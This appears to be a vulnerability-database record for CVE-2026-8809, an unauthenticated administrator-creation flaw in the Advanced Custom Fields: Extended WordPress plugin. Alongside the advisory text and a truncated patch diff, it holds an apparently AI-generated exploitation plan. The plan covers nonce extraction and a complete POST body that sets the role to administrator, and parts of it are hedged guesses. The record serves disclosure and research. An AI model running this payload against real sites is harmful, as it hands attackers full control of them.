[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fUzADJFeIBwrAlfJEgJOfv_KZ82nWPz_Cw_LO8xcdHLQ":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":9,"research_fix_diff":35,"research_exploit_outline":36,"research_model_used":37,"research_started_at":38,"research_completed_at":39,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":40},"CVE-2026-8809","advanced-custom-fields-extended-unauthenticated-privilege-escalation-via-validation-bypass-to-acfpostid-parameter","Advanced Custom Fields: Extended \u003C= 0.9.2.5 - Unauthenticated Privilege Escalation via Validation Bypass to '_acf_post_id' Parameter","The Advanced Custom Fields: Extended plugin for WordPress is vulnerable to Privilege Escalation via Validation Bypass in all versions up to and including 0.9.2.5. The vulnerability exists due to the after_validate_save_post() function unconditionally trusting the attacker-controlled _acf_post_id POST parameter — with no authentication or integrity verification — to select a cleanup branch that silently discards all validation errors not prefixed with acfe:. This makes it possible for unauthenticated attackers to suppress both the role allow-list validation error added by acfe_field_user_roles::validate_front_value() and the administrator-role capability guard error added by acfe_module_form_action_user::validate_action(), causing wp_insert_user() to execute with an attacker-supplied administrator role argument and resulting in the creation of a new administrator-level user account. Exploitation requires the target site to expose a public ACFE frontend form configured with a Create User action that maps a role field.","acf-extended",null,"\u003C=0.9.2.5","0.9.2.6","critical",9.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Improper Privilege Management","2026-05-28 10:09:02","2026-05-28 22:27:27",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fbd332f49-5aa9-4207-89db-84692a6430e0?source=api-prod",1,[22,23,24,25,26,27,28,29],"acf-extended.php","assets\u002Fcss\u002Facfe-admin-input.css","assets\u002Fcss\u002Facfe-admin-input.min.css","assets\u002Fcss\u002Facfe-field-group.css","assets\u002Fcss\u002Facfe-field-group.min.css","assets\u002Fjs\u002Facfe-input.js","assets\u002Fjs\u002Facfe-input.min.js","includes\u002Facfe-field-functions.php","researched",false,3,"# Exploitation Research Plan - CVE-2026-8809\n\n## 1. Vulnerability Summary\nThe **Advanced Custom Fields: Extended (ACFE)** plugin (versions \u003C= 0.9.2.5) contains a critical privilege escalation vulnerability. The core issue lies in the `after_validate_save_post()` function, which hooks into the ACF validation process. This function incorrectly trusts the attacker-controlled `_acf_post_id` parameter to enter a \"cleanup\" code branch. In this branch, the plugin iterates through the global `$acf_errors` array and silences (removes) any validation errors that do not start with the `acfe:` prefix.\n\nSecurity-critical validation errors—specifically those preventing unauthenticated users from choosing a restricted role (like `administrator`) or preventing the \"Create User\" action from assigning high-privilege capabilities—are typically added by ACF or ACFE without the `acfe:` prefix. By suppressing these errors, an attacker can bypass role allow-lists and capability guards, allowing a public \"Create User\" form to create an administrator account.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** The vulnerability is exploited during a standard ACF form submission, typically targeting a page containing an `[acfe_form ...]` shortcode.\n*   **Vulnerable Action:** The form must be configured with a **\"User\"** action set to **\"Create User\"**.\n*   **Target Parameter:** `_acf_post_id` (used to trigger the bypass) and the specific ACF field input for the user role.\n*   **Authentication:** Unauthenticated (PR:N).\n*   **Preconditions:**\n    1.  A public-facing page must exist with an ACFE Frontend Form.\n    2.  The form must have a \"Create User\" action.\n    3.  A field in the form must be mapped to the \"Role\" setting of the User action.\n\n## 3. Code Flow (Trace)\n1.  **Request Initiation:** An unauthenticated user submits a POST request to a page containing an ACFE form.\n2.  **ACF Validation Initiation:** ACF begins its validation sequence (`acf\u002Fvalidate_save_post`).\n3.  **ACFE Role Validation:** The `acfe_field_user_roles::validate_front_value()` function is called for the role selection field. It identifies that an unauthenticated user is attempting to select a role they are not permitted to (e.g., `administrator`) and adds an error to the global `$acf_errors`.\n4.  **ACFE Action Validation:** The `acfe_module_form_action_user::validate_action()` function runs. It checks if the \"Create User\" action is attempting to create an administrator without proper permissions. It also adds a validation error.\n5.  **The Vulnerable Hook:** ACFE's `after_validate_save_post()` runs (likely at a high priority on the `acf\u002Fvalidate_save_post` hook).\n6.  **The Bypass:**\n    *   The function checks for the existence of the `_acf_post_id` POST parameter.\n    *   If present (and potentially matching certain criteria), it enters a cleanup loop.\n    *   It iterates through `global $acf_errors`.\n    *   It removes any error where the field name\u002Fkey associated with the error does not start with `acfe:`.\n    *   The role validation errors added in steps 3 and 4 are stripped because they are associated with standard field keys (e.g., `field_abcdef1234567`) or standard ACF error types.\n7.  **Logic Execution:** Since `$acf_errors` is now empty (or contains no relevant errors), ACF and ACFE proceed to the \"Save\" phase.\n8.  **Sink:** The \"Create User\" action executes, eventually calling `wp_insert_user()` with the attacker-supplied `role => 'administrator'`.\n\n## 4. Nonce Acquisition Strategy\nACFE Frontend Forms require an ACF nonce (`_acf_nonce`). These are generated for unauthenticated users (UID 0) but must be retrieved from the page context.\n\n1.  **Identify Form Page:** Find the page containing the `[acfe_form]` shortcode.\n2.  **Navigate:** Use `browser_navigate` to load the page.\n3.  **Extract Nonce:** ACFE\u002FACF typically localizes data or includes it in hidden inputs.\n    *   **Method A (Hidden Input):** Use `browser_eval` to extract from the DOM:\n        `browser_eval(\"document.querySelector('input[name=_acf_nonce]').value\")`\n    *   **Method B (JS Object):** Check for localized script data:\n        `browser_eval(\"window.acf?.get('nonce')\")` or `browser_eval(\"window.acfe?.get('nonce')\")`\n4.  **Extract Field Keys:** To submit the form correctly, we need the `name` attributes of the fields (e.g., `acf[field_5f123abc456de]`). These can be found by inspecting the form inputs via `browser_eval`.\n\n## 5. Exploitation Strategy\n### Step 1: Target Identification\nSearch for pages containing the ACFE form. Use `wp post list` and `wp post get` to find content with `[acfe_form`.\n\n### Step 2: Form Mapping Discovery\nDetermine which ACF field keys correspond to:\n*   Username (`user_login`)\n*   Email (`user_email`)\n*   Password (`user_password`)\n*   Role (`role`)\n\n### Step 3: Payload Construction\nConstruct a POST request to the form's URL (not `admin-ajax.php`, as ACFE frontend forms process on page load\u002Finit).\n\n**Parameters:**\n*   `_acf_nonce`: [Extracted Nonce]\n*   `_acf_form`: [Base64 encoded form configuration, usually found in a hidden input]\n*   `_acf_post_id`: `new_user` (Inferred value often used in ACFE for \"Create User\" actions; if not, use the current Post ID)\n*   `acf[field_user_login_key]`: `attacker_admin`\n*   `acf[field_user_email_key]`: `admin@attacker.com`\n*   `acf[field_user_pass_key]`: `Password123!`\n*   `acf[field_user_role_key]`: `administrator`\n\n### Step 4: Submission\nPerform the `http_request` as follows:\n```javascript\n{\n  method: \"POST\",\n  url: \"http:\u002F\u002Ftarget.local\u002Fpage-with-form\u002F\",\n  headers: {\n    \"Content-Type\": \"application\u002Fx-www-form-urlencoded\"\n  },\n  body: \"_acf_nonce=NONCE&_acf_form=CONFIG&_acf_post_id=new_user&acf[field_login]=attacker_admin&acf[field_email]=admin@attacker.com&acf[field_pass]=Password123!&acf[field_role]=administrator\"\n}\n```\n\n## 6. Test Data Setup\nTo verify in an isolated environment, create an ACFE form:\n1.  **Create Field Group:** Create a group with fields for Username (text), Email (email), Password (password), and Role (ACFE User Roles field).\n2.  **Create ACFE Form:** \n    *   Navigate to **ACF -> Forms**.\n    *   Create a new form named \"PrivEsc Test\".\n    *   Add a **\"User\"** action. Set \"Action\" to **\"Create User\"**.\n    *   Map the fields:\n        *   User Login: `field_username`\n        *   User Email: `field_email`\n        *   User Password: `field_password`\n        *   **Role**: `field_role`\n3.  **Publish Form:** Place the form on a public page: `[acfe_form ID=\"123\"]`.\n4.  **Note Field Keys:** Verbatim keys are required for the `acf[...]` parameters.\n\n## 7. Expected Results\n*   The HTTP response should indicate a success state (typically a redirect or the \"Success Message\" configured in the form).\n*   No validation errors regarding \"insufficient permissions\" or \"invalid role\" should appear in the response HTML, despite being an unauthenticated request.\n\n## 8. Verification Steps\nAfter the exploit attempt, use WP-CLI to confirm the creation of the administrator:\n```bash\nwp user list --role=administrator\n# Check for the username 'attacker_admin'\n```\nAlternatively, check if the user exists and has the correct capabilities:\n```bash\nwp user get attacker_admin --field=roles\n```\n\n## 9. Alternative Approaches\n*   **Different `_acf_post_id` values:** If `new_user` does not trigger the cleanup, try the numeric ID of the page the form is on, or the string `options`.\n*   **Direct Validation Endpoint:** Some ACF versions allow validation via `admin-ajax.php?action=acf\u002Fvalidate_save_post`. If the main form submission fails, try sending the validation request first with `_acf_post_id` to see if it returns `{\"valid\": 1}`.\n*   **Field Mapping:** If the \"Role\" field is hidden, the attacker may need to include it manually in the POST body using the discovered field key.","The Advanced Custom Fields: Extended plugin (\u003C= 0.9.2.5) is vulnerable to unauthenticated privilege escalation due to a validation bypass. The 'after_validate_save_post' function incorrectly trusts the attacker-controlled '_acf_post_id' parameter to trigger a cleanup routine that removes security-critical validation errors, allowing unauthenticated users to create administrator accounts via front-end forms.","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Facf-extended\u002F0.9.2.5\u002Facf-extended.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Facf-extended\u002F0.9.2.6\u002Facf-extended.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Facf-extended\u002F0.9.2.5\u002Facf-extended.php\t2026-05-20 12:31:30.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Facf-extended\u002F0.9.2.6\u002Facf-extended.php\t2026-05-28 07:26:36.000000000 +0000\n@@ -2,7 +2,7 @@\n \u002F**\n  * Plugin Name: Advanced Custom Fields: Extended\n  * Description: All-in-one enhancement suite that improves WordPress & Advanced Custom Fields.\n- * Version:     0.9.2.5\n+ * Version:     0.9.2.6\n  * Author:      ACF Extended\n  * Plugin URI:  https:\u002F\u002Fwww.acf-extended.com\n  * Author URI:  https:\u002F\u002Fwww.acf-extended.com\n@@ -19,7 +19,7 @@\n class ACFE{\n     \n     \u002F\u002F vars\n-    var $version = '0.9.2.5';\n+    var $version = '0.9.2.6';\n     \n     \u002F**\n      * construct\n@@ -53,6 +53,9 @@\n         acfe_include('includes\u002Facfe-file-functions.php');\n         acfe_include('includes\u002Facfe-form-functions.php');\n         acfe_include('includes\u002Facfe-helper-functions.php');\n+        acfe_include('includes\u002Facfe-helper-array-functions.php');\n+        acfe_include('includes\u002Facfe-helper-multi-functions.php');\n+        acfe_include('includes\u002Facfe-helper-string-functions.php');\n         acfe_include('includes\u002Facfe-meta-functions.php');\n         acfe_include('includes\u002Facfe-post-functions.php');\n         acfe_include('includes\u002Facfe-screen-functions.php');\n@@ -139,6 +142,7 @@\n             'field\u002Frecaptcha\u002Fv2\u002Fsize'           => '',\n             'field\u002Frecaptcha\u002Fv3\u002Fhide_logo'      => '',\n             'compatibility\u002Flegacy_title_toggle' => false,\n+            'compatibility\u002Flegacy_field_group'  => false,\n \n         ));\n ... (truncated)","The exploit requires an unauthenticated attacker to target a front-end form generated by the ACFE plugin configured with a 'Create User' action. The attacker first identifies the form on a public page and extracts the necessary '_acf_nonce', '_acf_form' configuration, and the specific field key mapped to the user role. By submitting a POST request that includes the '_acf_post_id' parameter (set to a value like 'new_user') along with a field value of 'administrator', the attacker triggers a logic flaw in the plugin's validation cleanup process. This process removes all validation errors not prefixed with 'acfe:', effectively silencing the security checks that would normally block unauthorized role assignment, resulting in the creation of a new administrator-level user.","gemini-3-flash-preview","2026-06-04 15:48:27","2026-06-04 15:49:15",{"type":41,"vulnerable_version":42,"fixed_version":11,"vulnerable_browse":43,"vulnerable_zip":44,"fixed_browse":45,"fixed_zip":46,"all_tags":47},"plugin","0.9.2.5","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Facf-extended\u002Ftags\u002F0.9.2.5","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Facf-extended.0.9.2.5.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Facf-extended\u002Ftags\u002F0.9.2.6","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Facf-extended.0.9.2.6.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Facf-extended\u002Ftags"]